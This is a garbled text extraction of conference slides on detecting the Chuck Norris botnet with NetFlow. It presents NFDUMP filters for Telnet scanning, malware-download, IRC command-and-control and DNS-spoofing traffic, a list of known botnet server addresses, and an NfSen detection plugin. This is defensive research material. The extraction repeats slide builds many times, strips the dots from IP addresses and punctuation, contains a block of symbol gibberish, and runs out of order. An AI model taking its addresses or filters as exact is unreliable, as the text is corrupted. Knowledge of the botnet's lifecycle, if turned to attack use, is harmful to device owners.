Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
